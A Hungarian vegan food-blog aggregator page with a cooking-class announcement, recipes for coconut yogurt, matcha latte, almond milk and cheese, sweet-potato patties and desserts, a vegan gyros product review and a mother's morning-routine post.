Az évek során nagyon sokan kérdeztétek, hogy mikor tartok főzőtanfolyamokat, ahol tanulni tudtok, ismerkedni a vegán étrenddel, konyhával. Vannak olyanok, akik nemrég írtak nekem, hogy családostul átálltak a vegán étrendre és jól jönne egy kis segítség főzés terén, meg abban, hogy mit, hol lehet beszerezni, mi legyen a kamrában, a hűtőben, hogy egészséges reggelit, ebédet vagy vacsorát tudjanak készíteni a családnak. Mindezekre a kérdésekre választ kaphattok, ha eljöttök hozzám!
Többféle órát állítottam össze (majd bővülni fog a lista), így mindenki megtalálhatja a számára legkedvezőbbet:
Vegán brunch
Kezdő vegánoknak vagy haladó hedonistáknak: késői reggeli és korai ebéd egyben (a brunch szó a breakfast és a lunch, a reggeli és az ebéd kifejezésekből tevődik össze). Könnyed, frissen facsart, préselt zöldség- és gyümölcslevekkel kezdünk, ezt követi egy laktató turmix, amivel kibírjuk addig, amíg a többi finomság elkészül. Lesz vegán rántotta, többféle humusz, saláta, puding és még sütemény is. Nem maradunk éhesek, az biztos!
Vegán lettem, mit egyek?
Sokan hirtelen váltanak vegán étrendre és elbizonytalanodnak, hogy mit is ehetnek, ami tápláló, finom és jól is laknak tőle. Ez az óra a kezdő vegánoknak, vagy a vegán étrend iránt érdeklődőknek szól, akik egyszerű, olcsó ételek elkészítésével szeretnék megalapozni a tudásukat.
Vegán családi ebédek, vacsorák
Ez az óra főleg anyukáknak, házitündéreknek, dolgozó nőknek szól, akik szeretnének családbarát recepteket megismerni, amelyek tálalásával jól lakatják a gyerekeket, a családot és a nem vegán rokonságot is. Leves, főétel, saláta és még egy desszert is belefér egy teljes családi menübe!
A főzőkurzusokra a lentebbi gombra klikkelve tudtok jelentkezni, de a blogom fejlécében találtok egy Zizi Konyhája menüt, amelyre klikkelve minden információt mindig könnyen megtaláltok (hogyan lehet jelentkezni, hol lesz a kurzus, stb.).
Várlak benneteket szeretettel!
kakaós kókuszos amerikai palacsinta túrókrémmel
2017. december 9. Beautilicious
Egy ráérős reggelen nincs is jobb, mint egy frissen sült amerikai reggeli egy picit megreformálva. Egészséges finomság, amit a családban mindenki imádni fog Hozzávalók - 50gr kölesliszt - 50gr kókuszreszelék - 45gr + 2ek édesítőszer - 2 tojás - 30gr kakaópor - fél csomag sütőpor - 100+50ml kókusztej - 50gr sajtkrém - 250gr túró - kókuszolaj a sütéshez Így készítsd - A tojásokat válaszd ketté - A sárgáját keverd fehéredésig az édesítővel - Add hozzá a kókusztejet, majd a száraz hozzávalókat - A fehérjét verd kemény habbá, majd forgasd a masszába - Süsd ki kókuszolajban - Amíg sül a tészta, keverd össze a túrókrém hozzávalóit: a 2ek édesítőt, 50gr sajtkrémet, 50ml kókusztejet és 250gr túrót
narancskrémes sütőtöktekercs
2017. december 2. Beautilicious
Volt itthon egy rakat sütőtök, és akadt némi szabadidőm, gondoltam kipróbálok valami újat. Nagyon szeretem a sütőtököt, mert piskótákba, krémekbe, magába, vagy köretként is nagyon finom. Nálam mindenesetre top listás zöldség, és az íze is nagyon finom. Ha ezt a finom ízt párosítod naranccsal, vigyáznod kell, mert könnyen függő leszel. Hozzávalók - 3 tojás - 85gr kölesliszt - 15gr bambuszrostliszt - 300gr sült sütőtök - 100gr édesítő + 50gr - fél citrom leve - szódabikarbóna - 1 narancs leve - 100gr túró - 150gr joghurt - 30gr zselatin Így készítsd - A tojásokat keverd habosra 100gr édesítővel, és fél citrom levével - Pürésítsd a sütőtököt, majd add a tojásokhoz - A liszteket keverd el a szódabikarbónával, öntsd bele a sütőtökös masszát - Öntsd a masszát sütőpapírral bélelt tepsibe, és süsd ki 20perc alatt - A krémhez turmixold össze a túrót, narancslevet, joghurtot és az édesítőt, majd keverd hozzá a zselatint - Töltsd meg a piskótát, majd tekerd fel, és csomagold alufóliába - Tedd 1 éjszakára a hűtőbe, és másnap szeleteld fel
Kókuszjoghurt (laktózmentes, gluténmentes, vegán) + Smartchef szakács robot készülék
2017. december 1. Zizi kalandjai
Korábbi bejegyzésben írtam, hogy azon szerencsés 12 személy közé kerültem, akiket kiválasztottak, hogy teszteljék a Smartchef szakács robot készüléket. Első receptként egy “lassú főzés” (slow cooking) programmal főzött babgulyás receptjét hoztam nektek, most pedig egy nagyon egyszerű laktózmentes, vegán kókuszjoghurt receptjét.
Soha nem voltam nagy joghurt evő, magában nem igazán ettem, amikor még húsevő vagy vegetáriánus voltam. Most sem kívánom magát a joghurtot, viszont jól esik néha reggelire a granolát ezzel enni, vagy pedig a turmixba tenni, hogy növeljük a krémes ital tápértékét egy kis probiotikummal. A Smartchef segítségével nagyon leegyszerűsödik a joghurt készítés. Persze ne számítson senki olyan sűrű joghurtra, mint a tehéntejes változatnál… ez inkább lesz egy olyan ivójoghurt állagú, mint sűrű. Kétszer kétféleképpen készítettem… először csak kókusztejet és probiotikumot raktam bele – folyékony lett a joghurt, az íze viszont kellemesen savanykás, nagyon enyhén kókusz ízű. Második alkalommal már tettem bele sűrítőanyagot – nyílgyökérlisztet – és egy kevés agavészirupot, hogy a baciknak legyen mit enniük (vagyis az édesítőszer nem a joghurt édesítésére szolgál). Csak egy nagyon kicsivel lett sűrűbb a joghurt állaga, de ízre ugyanolyan finom lett. Elképzelhető, hogy ha a receptben megadott nyílgyökérliszt mennyiségét növeljük, akkor még sűrűbb lesz a joghurt!
A joghurt készítéséhez probiotikumot itt tudtok beszerezni.
Kókuszjoghurt (laktózmentes, gluténmentes, vegán) + Smartchef szakács robot készülék Mentés Nyomtatás Előkészítési idő 5 perc Főzési idő 8 óra Teljes idő 8 óra 5 perc Nagyon finom, krémes, folyékony állagú, enyhén kókusz ízű, vegán joghurt! Szerző: Zizi Recept típusa: reggeli, joghurt, ital Konyha: vegán, gluténmentes Adag/mennyiség: 1 liter Hozzávalók 1 liter kókusztej ⅓ része egy ilyen probiotikum kapszulának 3 teáskanál nyílgyökérliszt 1 teáskanál agavé szirup Elkészítés Öntsünk minden hozzávalót a Smartchef edényébe. Válasszuk ki a joghurt (YOGHURT) programot, majd a START gombot megnyomva, indítsuk el a programot. A készülék tetejét végig tartsuk lecsukva. Ez a program 8 órán át keresztül készíti a joghurtot 39C fokon. Ha a joghurt elkészült, töltsük át egy üvegbe. Hűtőben tartva egy hétig eláll. Jegyzetek Aroy-D márkájú kókusztejet használtam, ami krémes tejszín állagú, nagyon jól lehet dolgozni vele, kiváló lett a joghurt íze. Ázsiai, keleti fűszeres boltokban és webshopokban szerezhető be. A joghurt elkészíthető nyílgyökérliszt és agavészirup hozzáadása nélkül is, akkor még hígabb lesz az állaga (ivójoghurt). A vegán probiotikum kapszula itt szerezhető be. Granola recepteket itt találtok. Kókuszjoghurtot az is tud készíteni, akinek nincsen Smartchef készüléke. Receptet találtok a Mit eszik a vega gyerek? című szakácskönyvemben. 3.5.3229
A kókuszjoghurt elkészítéséről videó is készült...
Paprikás, édesköményes tészta pirított magvakkal
2017. november 29. Élj harmóniában
A tésztafélék gyorsan elkészülnek, változatos formában léteznek és nagyon jó fehérjeforrások, ha magvakkal kombinálod őket. Ma a hűtőben körbenéztem és megláttam néhány piros színű paprikát, majd elgondolkoztam mit készítsek belőle. Elsőre a tészta villant be, de a paprika nekem túl tömény ezért hozzá tett egy nagy édesköményt is. Az eredmény nagyon ízletes lett. Paprikás, édesköményes tészta pirított magvakkal Hozzávalók 3 ek. ghí ( vegán változatban kókuszzsír) 1 nagyobb édeskömény 3 piros színű paprika csipet asafoetida (más néven hing) elhagyható 1 ek. oregánó 1 ek. bazsalikom 0,5 ek kakukkfű 6 ek. napraforgómag só víz 250 g tészta ( gluténmentes diétában gm tészta) Vegyszermentes (bio) alapanyagokat használj! A napraforgómagot szárazon (zsiradék nélkül) pirítsd meg egy serpenyőben és tedd félre. A paprikát és az édesköményt mosd meg és vágd vékony darabokra. A zsiradékot tedd egy forró serpenyőbe. Tedd bele az asafoetidát pirítsd egy rövid ideig. Add hozzá a paprikákat és pirítsd őket néhány percig, majd add hozzá az édesköményt és a többi fűszertis. Kevergesd , amíg a zöldségek megpuhulnak. A végén keverd hozzá a pirított napraforgómagot. Keverd össze a kifőtt tésztát a zöldségekkel és a végén locsold meg olívaolajjal vagy napraforgóolajjal.
Füstölt tofus-ananászos rizstészta
2017. november 21. Vegán receptek Tőlünk Nektek
Hozzávalók:
- 1 zacskó rizstészta
- 2 dl soya szósz
- mirelit zöldborsó ízlés szerint
- füstölt tofu (1-2 zacskó, ez is ízlés szerint)
- 1/2 ananász konzerv
Ez egy nagyon gyors, és egyszerű recept. A rízstészta kb 5 perc alatt megfő a forró vízben, ha kész leszűröm, pici olajat teszek rá, és félre teszem. Nem szabad nagyon sózni főzés közben, mert a szója szósztól esetleg túl sós lehet majd a végeredmény. Egy kevés olajra rádobom a kockára vágott füstölt tofut, ízlés szerinti zöldborsót, vagy kukoricát, de lehet mindkettőt. Pár percig futtatom a forró olajon, lezárom, és míg forró az edényem, beleöntöm a szójaszószt, és beledobálom a kis szeletekre vágott ananász konzervet. Pár percig hagyom ismerkedni egymással az összetevőket, majd bele keverem a rizstésztát is.
Nagyon gyors, nagyon egyszerű! Az ananász édes íze, a tofu füstölt íze, és a szójaszósz együtt különleges ízélményt ad!
Jó étvágyat!
túrókrémes kakaós piskótatekercs
2017. november 19. Beautilicious
Édesszájúak fel a fejjel! Az életmódváltás, diéta, egészség nem egyenlő a finomságok megvonásával. Ezt mivel sem szemléltethetném jobban, mint a frissen a sütőből érkezett kakaós piskótatekercs, amit vaníliás túrókrémmel töltöttem meg. Hozzávalók - 6tojás - 20gr kakaópor - 80gr édesítő - 100gr kölesliszt - 1csomag sütőpor - 300gr túró - 125gr natúr joghurt - 3ek édesítő - vanília Így készítsd - Válaszd ketté a tojásokat - A sárgájához add a 80gr édesítőt, és keverd fehéredésig - Add hozzá a lisztet, kakaóport és a sütőport - Verd fel a fehérjét kemény habbá, majd forgasd a sárgájához - Süsd ki 15perc alatt 160fokon - Addig keverd össze a túrókrém hozzávalóit - Ha kisült a tészta, töltsd meg krémmel, tekerd fel, és tedd félre legalább fél órára szeletelés előtt
"nutellás" gombóc
2017. november 11. Beautilicious
Nutellával az egészségért? Naná! Nem kell lemondanod a sok finomságról. Sőt! Ez valami brutál finom lett. Igen tudom, ez nem nutella, de nagyon jó íze van, és százszor egészségesebb, mint a hagyományos nutella, ráadásul nyugodt szívvel falatozhatjuk, persze ezt is csak mértékkel. Hozzávalók - 500gr csicsóka - 1 tojás - 130gr zabliszt - 20gr útifűmag héj - 1 csipet só "nutellához" - 300gr csicseriborsó (konzerves) - 50ml kókusztej - 25gr kakaópor - 40gr édesítőszer Forgatáshoz kakaópor, de pirított zabkorpába, vagy akár darált mandulába is forgathatod Így készítsd - Főzd puhára a csicsókát, majd hámozd meg - Nyomd össze krumplinyomóval - Add hozzá a tojást, majd a többi hozzávalót is - A nutellához csak turmixold össze a hozzávalókat - A tésztából formázz korongot, töltsd meg nutellával, majd gyúrd gombóccá - Forró vízbe főzd meg kb 10 perc alatt, míg fel nem jön a víz tetejére - Forgasd kakaóporba
Mandulatej és mandulasajt
2017. november 9. Gitta nyersétel blogja
A legegyszerűbb és leggyorsabb étel-ital kombináció, amit el tudok képzelni akkor, ha egyébként már van valamilyen zöldségféle elkészítve, saláta vagy valamilyen köret. Igen, ezt ajánlom, ha fel szeretnéd dobni a salátád, vagy csak felvágsz néhány szem paradicsomot, újhagymát hozzá... és készen is van a fantasztikus főétel. Először is, mandula kell hozzá, ebből van kétféle. Van a blansírozott és a héjas. blansírozott mandula héjas mandulaMindkettő jó, de: - a blansírozott mandula már nem nyers. Levették a héját, de ez a művelet nagyüzemi környezetben hőkezeléssel jár, így bár a blansírozott mandulát azonnal fel tudod használni, tudd, hogy ez így már nem nyers. Igaz, hogy tele van rengeteg ásványi anyaggal, vitaminnal, vagyis nem kell ezt a változatot azonnal elvetni, én szoktam ilyen mandulát is vásárolni, és ha nincs időm előkészíteni a héjas mandulát, akkor ezt használom. - a héjas mandula az igazi. Ez nyers, és ha hazai a forrásod, akkor még jobb. Ezzel viszont munka van. Legalább 12 órára be kell áztatni, közben lehet az áztató vizet cserélgetni, hogy minél tisztább legyen. Hogy erre miért van szükség? Azért, hogy az enzimek feléledjenek, az enzimgátlók lebomoljanak, azért, hogy az alvó magból élő legyen! Most ennél a receptnél nem jó, ha a héja rajta marad, ezért az áztatás után leülünk egy csendes helyre, és egyenként eltávolítjuk minden egyes mandula darab héját. Igen, jól látod... meg lehet kérni a család többi tagját, vagy át lehet hívni a szomszédot, ugyanis társaságban gyorsabban megy az idő, és ha többen csináljátok, hamarabb készen is van. Ha ezzel készen vagy, akkor az áztatott-meghámozott mandula készen áll arra, hogy mandulatejet, illetve mandula sajtot készítsünk belőle. Mandulatej Hozzávalók: 20 dkg mandula (blansírozott vagy beáztatott, lehéjazott) 1,6 liter víz ízlés szerint édesítés (méz vagy bármilyen természetes édesítőszer) ízlés szerint ízesítés (vanília, vagy fahéj, vagy esetleg kakaópor) Turmixgépbe tesszük a mandulát és a víz felével simára turmixoljuk. Nincs szükség drága tejkészítő masinára... Ha ezzel megvagyunk, hozzáöntjük a víz másik felét, elkeverjük, és egy nagyon finom nylon szűrőzsákon átszűrjük. (ha nincs ilyen zsákunk, akkor egy nylon zokni, harisnya is megteszi) Átszűrjük, kinyomkodjuk, mindaddig, amíg a pép olyan száraz nem lesz, hogy abból már alig lehet folyadékot kinyerni. Vagyis: ezzel a művelettel kettéválasztottuk a folyadékot a mandula rostjától. A fehér folyadék egy kifejezetten mandula ízű, tejszerű ital lesz, amit visszatehetünk a turmixgépbe, és hozzáturmixolhatjuk az édesítő-, illetve az ízesítő anyagokat. Mandulatej A visszamaradt pép lesz a mandulasajt alapja. És itt jön az, hogy miért is kellett a mandula héját lehúzni, hát azért, hogy ez a sajt szép tiszta fehér legyen. Ha nem szeretnéd felhasználni a pépet mandulasajt készítéshez, akkor nem feltétlen szükséges lehéjazni (de beáztatni igen) mandulapép, ami a tejkészítés során visszamaradAz így visszamaradt mandulapép sokoldalúan felhasználható, pizza alapba, fasírtba, édességbe tehető, és készíthető belőle fincsi sajt. Mandulasajt Hozzávalók: kb 20 dkg mandulapép (a tejkészítésnél megmaradt pép) 2 evőkanál sörélesztő pehely, 2 mokkáskanál só 1-2 evőkanál friss citromlé 1 evőkanál utifűmaghéj Az elkészítése nagyon egyszerű: minden összetevőt elkeverünk, lehetőleg simára. Ha nagyon száraz lenne (a tejkészítésnél túl jók voltunk), akkor egy kis mandulatejet vagy vizet lehet még hozzátenni. A sörélesztő pehely adja meg a sajt ízét, az utifűmaghéj pedig az állagról gondoskodik. Ez a sajt alaprecept. Ezt lehet variálni nagyon sokféleképpen, füstös fűszerpaprikával, céklával, curryvel, algával lehet ízesíteni, színezni, kinek milyen kedve van épp. Ezt a sajtot lehet enni csak úgy magában, golyókat lehet belőle formázni, cukkinibe lehet tölteni, tortába lehet belőle tenni egy réteget, és még sorolhatnám. vegamix-szel megszórva, friss zöld fűszerekkel Pirospaprikával megszórva, friss zöld fűszerekkel Színes fűszerekkel megszínezve, golyókat formázva Színes sajtgolyók salátával A mandulasajt cukkini tekercsben A mandulasajt zöldségtortában sok sikert és jó étvágyat hozzá :)
Matcha latte (laktózmentes, gluténmentes, vegán)
2017. november 8. Zizi kalandjai
A szülinapomon (október közepén) elhatároztam, hogy leszokom a mindennapi kávéivásról. Régen csak hetente egyszer ittam kávét (szombatonként) a piacozás után. Aztán másfél éve valahogy rászoktam, hogy szinte mindennap ittam ebéd után, olyan szertartásként. Éreztem, hogy nem jó nekem, meg nem is akartam fejben a mindennapi kávéivást, de valamiért a szertartás annyira belém rögzült, hogy nehéz volt megválni tőle. Aztán I. is elhatározta, hogy abbahagyja a mindennapi kávéivást, így közösen támogatva egymást abbahagytuk és nagyon jó érzés. Lassan egy hónapja, hogy nem ittunk kávét. Most tesztelgetjük a teákat, meg az “alternatív” latte lehetőségeket és sok olyan van, ami nagyon ízlik nekünk.
Iszunk koffeinmentes teákat, kurkumás lattekat a kávé helyett. Keresem az újabbnál újabb recepteket és csodás dolgokra bukkanok a neten, mint például ez a spirulinás latte vagy misos latte (ami mézzel készült, de a mézet lehet helyettesíteni más édesítőszerrel) vagy pirított kókusztejes tea (pirított kókusztej? toplistás kipróbálandó!!!) vagy fehércsokis gabonakávés mokka.
Persze nem maradhat ki a listáról a matcha latte, ami nagyon nagy népszerűségnek örvend manapság. Már Magyarországon is megtalálható jó pár (főleg) specialty kávézó itallapján. A matcha (??) a rituális japán teaceremóniák köztiszteletben álló teája. A legelső tea magvakat még a kínai Tang-dinasztia (618-907) idején szállították Japánba, hogy orvosságként használhassák. Sokáig csak a papok, nemesek és szamurájok ismerték a jótékony hatásait, melyet féltve őrzött titokként kezeltek. “A matcha a zöld teának egy speciális változata, a neve szó szerint azt jelenti, hogy por állagú tea. Míg a hagyományos zöld tea elkészítése során a tealevelek összetevői belekerülnek a forró vízbe, majd a leveleket ki kell dobni, a matcha esetében a leveleket előbb porrá őrlik, és így vízzel érintkezve akadály nélkül képesek feloldódni. Ennek az eljárásnak köszönhetően a matcha sokkal több hasznos tápanyagot tartalmaz, mint a többi teaféle. A vitaminok és ásványi anyagok mellett antioxidánsokban is gazdag, így megvéd a szívbetegségektől és a ráktól, valamint képes szabályozni a vércukorszintet és a vérnyomást is. A matcha abban is eltér a többi teafélétől, hogy háromszor annyi koffeint tartalmaz, ám ez a koffein a kávéban találhatóval szemben sokkal nyugtatóbb hatású. Ezzel együtt lefekvés előtt hat órával már lehetőleg ne fogyasszuk.” (Forrás: innen). Kathynél az egyik kedvenc vegán bloggeremnél találtok egy nagyon jó összefoglalót a matcharól, a különböző fajtákról és néhány recept ötletről.
Aki igazán szeretne profin matcha lattét készíteni, annak ajánlom, hogy szerezzen be egy ilyen bambusz teakeverő ecsetet, ezzel igazán autentikusan lehet elkészíteni a teát. Nekem nincs (még) ilyenem, szóval én kanállal kevertem el a teaport a vízben, a kókusztejet pedig simán habverővel kevertem habosra a teához.
Matcha latte (laktózmentes, gluténmentes, vegán) Mentés Nyomtatás Előkészítési idő 2 perc Főzési idő 5 perc Teljes idő 7 perc Kávé helyett, habos kókusztejes zöld tea. Szerző: Zizi Recept típusa: ital Konyha: vegán Adag/mennyiség: 1 főre Hozzávalók 2 teáskanál Veganz kókuszos matcha por 1 teáskanál juharszirup 60 ml meleg víz 125 ml kókusztej (sűrű, krémes) Elkészítés Tegyük a matcha port a bögrébe, adjuk hozzá a nagyon meleg (de nem forrásban lévő) vizet és jól keverjük el. Adjuk hozzá a juharszirupot és azzal is keverjük el. A kókusztejet melegítsük fel egy lábasban és kézi habverővel vagy tejhabosítóval verjük habosra és öntsük rá a matchás keverékre. Fogyasszuk azonnal melegen. Jegyzetek A Veganz matcha por tartalmaz nádcukrot. Érdemes először magában megkóstolni és utána ízesíteni. Nekem jól esett az 1 teáskanál juharszirup. Juharszirup helyett lehet használni agavészirupot, nádcukrot, kókuszvirágcukrot. Bármilyen matcha tea por és növényi tej használható a recepthez. Aroy-D márkájú kókusztejet használtam, nagyon finom lett vele. 3.5.3226
*****
A kókuszos matcha port a {Spar Magyarország} biztosította a recepthez. A véleményem csakis a sajátom.
Csőben sült brokkoli
A brokkoli rosttartalma jótékony hatású székrekedéses panaszoknál, mivel serkenti a belek mozgását. Ásványi anyagai közül említésre méltó a kálium (300 mg fölött), a kalcium (87mg körül), a magnézium, nátrium, a vas, a cink és a foszfor. A nyers növényben B1-, B2-, B6-vitamin, C-vitamin, K-vitamin és E-vitamin is kimutatható, valamint az A-vitamin provitaminja, a béta-karotin. Igen gazdag folsavban is. (Forrás: Házipatika.com, Máriáss Márta)
A brokkoliban többféle glukozinolát található, ezek egyike a glukorafanin. Ennek hasítása során keletkezik a biológiailag aktív rafanin, illetve a hozzá hasonló szulforafán. A szulforafán a vírusok elleni küzdelemben is segítségünkre lehet. Egy 2016-ban közölt, kettős vak, placebokontrollált vizsgálatban nemdohányzó kísérleti alanyokat fertőztek meg élő, gyengített influenzavírusokkal. Ahogy az várható volt, az influenzavírusok már egy-két nap után összetett folyamatokat indítottak el a placebocsoportban, amelyre az immunrendszer gyengülése volt jellemző. Ezt a folyamatot azonban a brokkolikivonat sikeresen gátolta, vagyis javította a szervezet védekezőképességét. (Forrás: Webbeteg.hu, Dr. Reinhardt István)
A recept
Hozzávalók:
- 1 kg brokkoli
- 35 dkg rizs
- kurkuma
- só
- 5 dl növényi tej
- fokhagyma (opcionális)
- 2 ek zabliszt
- 2 ek sárgaborsó liszt
- kókusz zsír
- paprika
- vegán füstölt sajt
- ételízesítő
Elkészítés:
A brokkolit rózsáira szedjük, a lábos alján kevés sós vízzel, fedő alatt megpároljuk. Közben átmossuk a rizst és sós, kurkumás vízben megfőzzük. Ezt követően besamel-szerű mártást készítünk: E gy edényben 2 ek kókuszzsírt 2 dl növényi tejjel összemelegítjük. 3 dl hideg növényi tejjel csomómentesre keverjük a két lisztet és hozzákeverjük ahhoz a növényi tejhez, amivel a kókusz zsírt összemelegítettük. Kis lángon addig keverjük, amíg be nem sűrűsödik. Ételízesítőt szórunk bele. Ha sárgább színt szeretnénk, egy kis kurkumát is tehetünk bele, ha esetleg az ételízesítő nem színezné be eléggé. Ha fűszeresebb ízt szeretnénk, nyomhatunk bele 2-3 gerezd megpucolt fokhagymát vagy szórhatunk bele fokhagyma-granulátumot. Enyhén sajtos ízvilágot érhetünk el némi sörélesztő pehely hozzáadásával. A megpárolt brokkolira öntjük a szószt.
Egy tepsit kókusz zsírral kikenünk, majd elsimítjuk benne a megfőtt rizst. A tetejére rakjuk a brokkolit, majd szeletelt paprikákat és végül megszórjuk reszelt, vegán füstölt sajttal. Sütőben addig sütjük, míg aranybarna lesz a teteje.
Pritaminpaprikás édesburgonya fasírt
2017. október 31. Vegán Család
Hozzávalók:
1kg hámozott, felkockázott édesburgonya
1 pritaminpaprika apró kockákra vágva
2 gerezd fokhagyma
1 kisebb lilahagyma
1 kisebb vöröshagyma
10 dkg teljes kiőrlésű tönkölyliszt
4 tk szójaszósz
3 tk só
bors ízlés szerint
olívaolaj sütéshez
[...] Bővebben!
kakaós csiga
2017. október 28. Beautilicious
Életmód megváltozik, kedvencek maradnak :D Senki se csüggedjen, inkább süssetek kakaós csigát és élvezzétek az egészséget. Hozzávalók - 75gr lenmagliszt - 25gr búzasikér - 35gr amaránt liszt - 15gr babuszrost liszt - 60+20gr édesítő - 1 csomag sütőpor - 1 tojás - 75gr sajtkrém - 50+15gr vaj - 20g kakaópor Így készítsd - Keverd össze a száraz hozzávalókat, majd add hozzá a nedveseket is (kivéve a töltelék hozzávalóit: kakaópor, 20gr édesítő, 15gr vaj) - Gyúrjuk össze jó alaposan, majd lisztezett ( én a bambuszrost lisztet választottam) felületen nyújtsuk ki - A töltelékhez a vajat picit olvassuk meg, majd keverjük össze a kakaóporral és édesítőszerrel - Töltsük meg a tésztát, tekerjük fel, majd szeleteljük - Helyezzük a csigákat tepsibe és süssük meg 180fokon 20perc alatt
Vegán Gyros, most már az otthonodban is, könnyedén
2017. október 27. Vegán lettem
Új termékkel rukkolt elő a Vegan Grill. A nem egészen egy hónapja piacra dobott Vegán Gyros segítségével otthonodban is átélheted kedvenc gyroszos élményeidet.
2016 szeptemberében jelent meg a Vegan Grill márka a magyar húshelyettesítők piacán és klasszikus ízeinek köszönhetően gyorsan sokak kedvencévé vált. A kezdésnek piacravezetett öt termék - a csípős és magyaros grill kolbász, valamint a csípős, magyaros és provance-i hagymás szejtán - után pár havonta dobták piacra újabb és újabb finomságaikat. Először Natúr Szejtánnal, majd bükkfán füstölt Száraz Bászkával és Grill Bászkával, végül a Vegán Gyrosszal bővítették repertoárjukat.
Vegán Gyros
A pikáns gyroszos fűszerezés és a vékonyra vágott szejtáncsíkok adják a Vegan Grill Vegán Gyroszának ízélményét. Érzésre olyan, mintha a kedvenc gyrosodnál lennél, csak nem kell elsétálnod már a sarokig sem, hisz otthon is elkészítheted a Vegán Manufaktúra klasszikus gyroszát. De nem csak a termékkel újítottak, hanem a csomagolás is változott. Az eddigi termékek vákuumcsomagolt rendszerrel készültek, de a Vegán Gyros már egy exkluzívabb megjelenésű papírdobozba került a vákuumcsomagoláson kívül.
Nálunk nagy kedvencek az eddigi Vegan Grill termékek, így nem volt kérdés, hogy leteszteljük a Vegán Gyrost is. Rögtön két csomaggal vásároltunk és többféle ételt készítve teszteltük őket. Kevés olajon megpirítottuk a csomagok tartalmát és készítettünk belőle hambit, sima szendvicset, kipróbáltuk fűszeres rizzsel és gombás mártással is. Ahogy a Vegan Grill hagymás szejtánjait, úgy a Vegán Gyrost is lényegében úgy használod fel ahogy akarod. Bármit készítettünk belőle, mindenhez passzolt. Egyébként a Vegan Grill facebook oldalán van egy kifejezetten receptes fül, ahova heti két recept kerül fel. Amióta a Vegán Gyrost piacra dobták, csak a gyrosból feltöltöttek négyet. Szóval egy szó mint száz, a lehetőségek tárháza határtalan, illetve a kreativitásunk húzza meg a határokat.
Budapesten aránylag már sok helyen hozzájuthatsz, de vidéken is fellelhetőek a Vegan Gyros és Vegan Grill termékek többek között Debrecen, Győr, Körmend, Miskolc, Szentendre és Veszprém városaiban. A vegangrill.hu oldalon elvileg a boltok is be vannak listázva, bár szerintem ennél sokkal több helyen kaphatóak már a termékeik. A nagyobb vidéki városokban biztos körbenéznék a bio boltokban és ha nem találom kérném, hogy rendeljenek, hiszen az összes nagyobb nagykereskedésben bent van már a Vegan Grill.
A Vegan Grill weboldala, ahol infókat találsz a Vegán Gyrosról.
A Vegan Grill facebook oldala, ahol Vegán Gyros recepteket találsz.
Vegán életmód – Reggeli rutinom (anya változat)
2017. október 25. Zizi kalandjai
Arra a következtetésre jutottam, hogy egy ember reggeli rutinjának bemutatása igen népszerű a Youtuberek világában. Az az igazság, hogy én is szeretem nézni, hogy mások hogyan indítják a napjukat, miket esznek egy nap (vegán változat) és szeretek bekukkantani mások bevásárlókosarába is. A kosárban csücsülő áruk sok mindent elárulnak egy ember életmódjáról. Kíváncsi vagyok nektek milyen fura szokásaitok vannak… ha van kedvetek, írjátok meg kommentben.
Szóval egy anya reggele… régimódi változatban, szövegesen, képekkel illusztrálva blog bejegyzés formájában, nem pedig Youtube videó formájában (Youtube csatornám már van, de a videók még váratnak magukra )! Ez a bejegyzés az ideális reggelemet mutatja be, amikor mindenre van idő. Persze ilyen ritkán van, mert anya tervez, gyerek végez. A sorrendet igyekszem tartani, de néha az is felborul vagy valamelyik éppen kimarad.
A reggeli ébredésem általában szoptatással indul. Ákoska ébreszt. Miután kijutottunk a konyhába vizet melegítek és langyos citromos vizet készítek magamnak (néha I. is iszik, akkor neki is csinálok). Ez beindítja a vérkeringésemet, kiváló lúgosító hatású és még számos jótékony hatása van, amelyekről itt írtam korábban. Új szokásként nemrég kezdtem bele a szintén lúgosító hatású zöld víz ivásába. Egy pohár vízbe egy teáskanál árpafűport teszek, ezt jól elkeverem és két húzásra megiszom. Nincsen borzasztó íze (szerintem)… olyan édeskés “zöld” íze van, amit lehet turbózni egy kis frissen facsart citromlével. A port egyébként turmixokba is lehet tenni, akkor teljesen elveszik a “zöld” íze, ha ez valakit zavarna. (“Az árpafűpor egyébként gazdag rostokban és klorofillban. Többféle ásványi anyagot is tartalmaz, mint például a kálcium, króm, réz, vas, magnézium, mangán, foszfor, kálium, a szelén vagy a bór.”)
Miután megittam mindent, jöhet a reggeli (amit az esetek 98%-ban I. készít el ). Mostanában zabkását eszünk különböző feltétekkel: almával, szőlővel, magokkal, magvajakkal, kókuszreszelékkel felturbózva és jöhet mellé még egy szelet sütőtök is, ha van időm megenni. Közben persze történnek egyéb dolgok is: mosogatógép kipakolása, mosogatás, elpakolás, játék, beszélgetés, beágyazás, pelenka csere, öltözködés.
Reggeli után jöhet a magam rendbe tétele, legalábbis a fejemé. Arcot mosok, majd jöhet a hidratálás. Nemrégen elfogyott a Hauschka arckrémem és nem volt időm elmenni venni egy másikat. Ekkor kaptam az ötletet Reginától – a fantasztikus Perla megalkotójától, akivel már interjút is készítettem -, hogy használjak Perlát arcápolásra bio rózsavízzel hígítva. Két csepp olajat nyomok a kezembe, ehhez fújok három fújásnyi rózsavizet (amelyet a Mannától veszek), összedörzsölöm a két kezemmel ezt a mixet és bemasszírozom az arcomba, a nyakamra. Egyszerűen leírhatatlan frissítő, kényeztető érzés ezt átélni! És jó tudni, hogy a Perlában lévő ligetszépe olaj regenerálja és lassítja a bőröm öregedésének folyamatát, a pálmarózsa olaj fiatalítja bőrömet és összehúzza pórusaimat. A még benne található kizárólag hidegen préselt, finomítatlan, organikus olajok a legjobbat teszik a bőrünkkel. A szemem környékére pedig a Hauschka regeneráló szemkörnyékápolóját használom. (Fontos tudni: igyekszem a kozmetikumok terén is a 100% vegánságra, de még vannak olyan termékeim, amelyek csak vegetáriánusnak felelnek meg, így ez a regeneráló szemkörnyékápoló is. A Hauschka lakto-ovo vegetáriánus termékeinek listáját itt találjátok, itt pedig a vegán termékekét, a cég viszont állatkísérlet mentes.)
A fürdőszobában zajlik még egy fogmosás és egy fésülködés is – bár utóbbira nem mindig van időm reggel. Ilyen esetben délután, amikor megyünk a játszótérre, indulás előtt megfésülöm a hajam.
Ha pedig extra időm van még reggel, akkor beveszem a vitamin adagomat. Nem szedek mindennap vitamint, csak két-három naponta. Itt a tálkában éppen Pregnazon van (még intenzív szoptatás miatt), C- és D3 vitamin egyben és egy vegán probiotikum kapszula (ilyen fajta innen).
Hát így néz ki egy reggelem (a családdal a “háttérben”). Kíváncsi vagyok a tiétekre is! Nektek mindenre jut időtök (ha igen, mi a titkotok)? Mi az, amit nem hagytok ki sosem?
Immunerősítő táplálkozás az őszi időszakra
2017. október 23. Élj harmóniában
